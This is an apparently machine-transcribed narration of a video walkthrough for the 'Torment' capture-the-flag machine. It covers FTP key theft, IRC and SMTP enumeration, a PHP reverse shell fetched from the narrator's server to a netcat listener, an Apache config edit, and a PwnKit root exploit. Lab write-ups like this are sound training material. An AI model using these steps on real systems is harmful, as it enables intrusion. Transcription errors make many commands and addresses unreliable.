Hello guys, welcome back to a Pentesters Club. Today we're going to solve another CTF challenge named called Torment. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: scanning, enumeration, exploitation, privilege escalation, and capture the flag. So first, open the terminal. So let me make it as a little bit big. So now just type here as to su, enter our password. Then just type here as to net discover minus I 80. So first we would like to identify our target machine. So I have identified my target machine is here. Now I just quit now. You just type here as nmap minus trico minus a as an aggressive scan, enter your targeted IP address 192.168.18.49. That's it. Let's wait for the nmap result. So these nmap results will take a little bit time. So but we have got it here. So where we have seen here, there FTP 21 is available. That 22 is available. Its open ports are available here. Then rest of that SLTP is open port. Then port 80 is open. 111 is open. Uh, 139 is open. So all the open ports is open here. Now uh, we have here like IRC server. So IRC server is like NGI RCD. So we know this NGI RCD as an IRC server. So let it be that one. Now let we would like to walk to the Firefox. Now let I just make a little bit big. Now enter your target IP address 192.168.18.a49. So this is in Debian Apache 2. So we would like to look the pesos. Here is no any useful information. So if here is no useful information, where we have got it here, port FTP is open. Now let's come back here. So let I just make a directory as a uh, uh, torment. Now I would like to go here as a torment. Now let me just type clear. Now just type here as FTP, enter your target IP address 192.168.18.a49. Logging with anonymous credentials. So default username and password. I just type this L. So we can't able to get all those things here. So we have identified one is available with SH. So we would like to go to this directory. So just copy this one. I just type here. Now, so now we would like to go to here as city. Now I would like to go to this directory. Now you just type here as list minus L. Now you just type here as get channels. I have watched this one. Now just come back here. Now let I just enter here as list minus L. Now just type here as cd dot sh. Now just type list minus L. Now just type here as get id underscore rsa, where we have got it here. Just type here as exit. Now just type clear. So where we have got it, all these things here. Now we just type here as let's just type here as cat channels. We have got it here, games and torment uh, ed printer. That's great. Now we would like to type here as cat id underscore rsa, where we got the private key here. So just type here now. Now, what we would like to do here is, so we would like to download the hex chart. So just type here as hex chart installation, just type yes, enter your password. So where it will download all things here of hex chart. It will take a little bit less than 1 second to download this hex chart. So we have here as an for hex chart. Output is to connect here where we would like to look here is 6667. So the name is NGIRCD. So just copy this one. Let's come back here. So where we have installed this one. So first I would like to install this. So you just write here as sudo apt-get install NGIRCD. So just write yes. So I would like to install this one. Now that was installed successfully. Now we just type here as a list of etc. Then let it paste this NGIRCD. So where I have this one, now just type here as cat etc uh, NGIRCD. Then you would like to know this as, let's paste this as a config. Now where we would like to this come back, come up. So where we would like to look here is come back to the sample one, this one. So we would like to look and analyze here. So this fall for NGIRCD. So user ID, link limits, where we would like to find here is options. So here I have something as a global uh, passwords for all users needed to connect to the server. So where we would like to look this, so come back. So where we not get operator ID, server IRC name. Here is 6667, the port with the NGIRC, the foreign set positive default. Let we would like to look here, initial. No, we not yet get here. So set the passive options is all here. It's case sensitive. Is my password, p password is peer secret. Uh, that we are not required here. So let me, I just come back here, we just write clear, we just write here as nano as etc. Then we just paste this NGIRCD, you just write here as, you just write here as config, you just write here as such is so where we cannot found here is, so come back. So better while doing all these things, so I would like to utilize here is somewhat yes. So I just quit this. Now you just type here as cat etc config. So entirely I just take this. So let's entirely just copy this one. So we would like to search the password only. So just entirely just copy, come back here. So let me, I just put here. So now let me, I just enter here as a password. So global password for all users needed. But to connect to the server is a default, not set. A password equal to, well, like Debian. So, so here not it given in proper way. So this and all I messed up. So I just write clear. So we know the password. Now let me, you just come back here, let it open new tab. So now just write here as extract. Now we have got it here as an extract. Now once we got into the hex chart, now what we would like to do here is, so you just you need to add a new name called as a dormant. Now just click on edit here. In the new server, you just need to enter your targeted IP address is 192.168.18.49 and 6667. This one, 6667. Now just come back here. Now where it was connected here is a default. Now let's come back here is default password where we have got it from. The here is this one. Just copy this one, come back here, let it paste it. One 192.168.8.49 6667. Just click on add. So I don't need to put here. So I just put here as auto join channels a server. You just put here 192.168.18.49, then 6667. So why it's not entering like 18.849? That's it. Then just click on close. So here not it added here. So just type here as torment. In this torment, we would like to edit here. We just change the target IP address 192.168.18.49. That's it. Now let's come back here. So we just copy this password, come back here, paste it. Now we just close this, try to connect. Connection is refused or failed. Okay, I not yet enter the right password over there. That's the port. Torment we would like to edit here. Here is the right port is 667. That's it. Now let's come back. 667. That's great. Now let me close this. Try to connect. Now it's trying to connect now. Let me would like to see. Uh, it was failed. Connecting as an EOP as an SSL. Again, there is an SSL error. So just close this again. So you need to look very carefully while doing this one. So you just come back here. So don't click uncheck this one, then let it close this. Try to connect. Capabilities, try a nickname, multiple prefix. Now I have got it here. Nickname NR. Uh, Here I have got it here as tournament. Now let uh, so nickname anonymous already is used. Try to be would like to change as something else. A test. Uh, no, it not. Maybe workout. I think so. Remote host has been closed for the socket. It was a retry. So it's okay. No worries. We just try here as Nick as it's here. Join this channel as so we have got it here. Uh, Something connection to the internet. Now just come back here, open here. Now just little bit type list. You just type here as cat channels. Now torment D a printer. So just copy this one, come back here. Now let me. I just paste it here. Then click on OK. Now I would like to make a little bit big here. Now you can see here where this entirely I just view extract no, we cannot able to copy here a settings auto dialogs windows and windows copy the selection. Okay, that's correct. Now let's come back here. So entirely I just delete here. Now let me paste it here. Now taking to a torment D printer. Topic of the torment D printer. If you find the printers are not printing as they should, you can configure them and check a jump jobs and logging in with the password. Most machines have a super secure key and along a passphrase, a topic for a torment server by a targeted data type, which we was got it here. So now let me would like to I just minimize this. Now let me would like to come back here. So where I have this IPE, so we would like to go to this targeted port a 631. So just copy this one. Let come back here. We would like to visit here as 631. Here we would like to look here all a 631. We would like to look here as user forum. In this user forum there is nothing else. We would like to look the download a softwares. No, nothing else. Now we would like to come back, nothing else here. So we would like to look the printers. So where you have seen here as Goodtech Inc, we have somewhat important usernames. So let me, I would like to write here as username. So let's just come back here. I would like to utilize here. So just type clear. Now we would like to reading from here. Now just type here as nano uh, user.txt. That's correct. Now right username is one is as Albert, another one is Charlotte, another one is a David. Now we would like to go to as Edmund. So we would like to write all the usernames. ETH at Eva. Oh, sorry, Eva. Now we would like to write here as Jenny, YV, Govin Govindaswamy. Then as Jessica, Kenny, Patrick, Queenie. Now we would like to hear you something. QIU. Now Ronaldo, Ronald, and you just write here as Sarah. That's it. So you just write Control O, Control X. So now you just write here as get user.txt. So we need to useful for all these users. So we would like to, I have got all mentioned here. Now we would like to go for directly for exploitation for here for SMTP. Now let's come back here. Where is SMTP is where is this 25? So we would like to go for an SMTP. Now let's go back to here as MSF console. Now let it start is MSF console. Now let me just write clear here. Now we would like to type here as we just type here as such SMTP enum. That's it. Oh, why? Yes. Yeah. Such SMTP enum. So just type clear. So here we not yet get this as such, so I would like to utilize as use auxiliary scanner SMTP and SMTP enum. Now it's okay. Now we just type here as show options. I have got here. Now just type here as set our hostess and carrier target. Type here as 192.168.18. What is that? Our targeted port is 49. That's it. Our targeted IP address is 49. So set user file is just type here as user file equal to where you have stored this one. So home vendors to club. Then you just type here as torment. Then user.txt. That's it. Now you just type here as exploit. That's it. Now we would like to look here from here. Now that will enumerate what else is available. Now let like so where I have got a right username as one is with a Patrick, another one is Q. So I would like to try with the Patrick. So where I have already the let's come back here. So I just that. So let's come back here. So I would like to show you here. I already have the ID underscore RSA. Now you just type here as give a permission chmod ID underscore RSA. Oh sorry, chmod 600 ID underscore RSA. Now let me just type here as sh minus I ID underscore RSA. I would like to use as a Patrick Patrick at the rate enter our targeted IP address 192.168.18.49. Let's give us permission. You just type yes. So So it may ask here as Patrick password. So what is the Patrick password? We really don't know here. So how we would like to do here? So we would like to utilize here as, let me like to look here. So we just it's denied by a public key. Okay, now just type a list minus here. So you just type here as clear. Now we just need to write very carefully. So just type here as chmod 600 id underscore rsa. Now just type list. Okay. Now I just type here as sh minus I. Enter the passphrase is, so it was denied. So what is the error here as Patrick? So we have a difficulties facing here. So we have done everything clear, but it's not working through very proper way. So how we would like to do here? So we would like to try here is, so the password of SSH, where we have got it in this here, we have forgotten here. So where this is the password. So this is the password. So let me like to come back here. So we just copy here. Now let's come back here. Let's paste it. Paste the password. I have successfully logged in here. Now, so this was a little bit tricky things. So you just need to understand very carefully. That's it. Now, what is our next target? Here is just write there as sudo minus l. It's like we need to go to like bin a systemctl and reboot. Okay. Now we would like to go to a cd temp directory. Now we would like to run the linpiece. So just come back here, open new tab. You just write there as linpiece GitHub. Just a privilege escalation for a linpiece. So just come back here. So where we not yet get this. So we would like to look this as first one. So we would like to try here as a first command. So just copy this one, let it paste it here. So curl are not found. It's okay. Now let me, I just get this. So just copy. You just write clear. You just type here as wg get and let it paste it here. So where it was waiting, which was get here. Now just try plus minus here. Now let me just type here as chmod 777 as a linpiece.sh. Now let's run this linpiece.sh. So where we would like to run this. So where we would like to identify here as something. So we would like to run this first or So where we have identify here, let's come back here. So you can look here etc Apache and Apache config. We would like to walk to this one. So you just copy this one. Now let me like to come back here. So where is this? Here. Now if you would like to know this here, now just scroll down. I think it was open. Everything is clear now. Now what we would like to do here is, so we have identified everything. Now just type here clear. Now just type here ls minus la. Let it paste this. So uh, after a lot of enumeration and searching here, and there will be an Apache 2.config is an Apache service that has a read and execute a permission for all the users. So where I have got to this, so now I just look here. Now we would like to type here as a nano, then let it paste it entirely this one etc Apache 2 and Apache 2.config. Now just come back here where we would like to, here is global configuration, keep alive. So here I would like to, this you need to be a set etc Apache nvrs run group. So here you just need to add here as, so don't modify anything else. So I'm adding something. User is q, then you just type as a group is q. That's it. So we added a QIU and group QIU inside the etc and Apache 2 and Apache 2.config. So that we leverage it for a privilege escalation. So the idea is when we restart the Apache server, it will be executed with a queue as user privilege. So parallelly, we would like to upload as pen test monkey as an PHP reverse shell and putting our target, changing, modifying our target type. So just with this. Now let me, I would like to go back here. Now just type here as PHP reverse shell. So we would like to go to here. Now let me, I just put here entirely just copy this error. I just copy it. Now just come back to your main machine. So here now just type here as a nano shell.php. So before that I would like to know this. I just type here as config. My targeted IP address is 139. Now I just type here as nano shell.php. As a reverse shell.php, I would like to modify as a little bit somewhat. So let it come back. So in here you would like to enter in the IP place. So your targeted IP address is, just come back here, enter your targeted IP address 192.168.18.139. Port is I would like to change this. Port is 7890. Control O, Control X. Now we have set up everything. So if you want to look here as mousepad shell.php, where we would like to look here is successfully we have modified everything here. So I just quit here. Now let's come back here, close this. So just close this here. Now first what you just need to do here is python-m http dot a server, where we have set up this. So now just where we would like to put this, we would like to walk to here as cd where at www html. So I would like to access directly from the browser based. Now you just type here as wget http, enter our targeted IP address 192.168.139 and 8000. rshell.php. That's it, where we have got it here. Now, what we would like to do here is, uh, before that, we would like to come back here. So, where we have, let me look here, plus minus here, where I have here rshell.php. I don't need to worry now. I can split now. You just write netcat minus lvnp 7890. That's great. We have set up the netcat listener here. Now, uh, our next target is, let's come back here. Here, you just type here as sudo bin systemctl reboot. So, where connection is closed and it was rebooted. Now, no need to worry. Now, let's come back here. This one, open here. So, you just enter your target IP address is and rshell.aphp. That's it. So, where our netcat listener it was starting. Now, let me like this. So, to elevate the root shell, we check the sudo users list and we would like to, once it was connected, now just try ID, it's not even connected yet. So, unable to connect here. So, okay, unable to connect means because I was entering the wrong format. So I just type here as netcat minus lvnp 7890. So I just no need to enter with a port. I just need to enter directly with 49 and rshell.php. So we are not don't need to go to XYZ places here. Let's see. So even it's going with HTTPS. No, we don't like with HTTPS. So just type here as HTTP and tell what target IP address. So I would like to come to here. Then you just type here as rshell.php. So here it will come as unable to connect because this one. I just come back here. Now I would like to try here as curl. You just utilize here HTTP 192.168.18.849 and you just type here as partial.http. Let either it may be will be connect or it may be a disconnect. Let me would like to try here. So now that Linux one which was we tried, that one is not work out. Now we would like to try this one. Now let's come back here. So now here what I would like to do here is I just type here as nano pwn git.c. Now entirely I just copy this entirely of the source code, come back here, let me just paste here. So where I have got this entire of this source code, now I just type Control O, Control X. Now I just type here as python -m http dot server. That's it. Now we would like to try here is something like we would like to try this. So go back here. So I just type here get HTTP and tell what target IP address 192.168.18.139 and you just type here as 8000 pwn kit.c, where I have got this pwn kit.c. Now we just type here as plus minus here. So here as pwn.kit. So Okay, that's clear. Now just write here as uh, which GCC. So here available. So just write here as GCC minus shared PWN kit dot C. Output for a PWN kit, then minus WL minus E entry with minus F PIC minus WL PWN kit no have, so just write list. So just copy this. So here is a mistake. I just try here. So where I have done here, I just write list PWN kit. Now let me. I would like to run this PWN kit where I have successfully came to a root access. That's it here. Now we just go to here as cd arrow plus minus here. Just write here as here. So you just type here as export tab equal to extra. Now just write here. You just write plus minus here. You just write here as cat proof.txt. Where congratulations on routing the tournament. I hope this box been fun. It's not fun. It's fully a frustrating. Until then, try harder. That's it. So we have successfully get this job done. So you try it your own guys. Thank you guys for watching and keep smiling.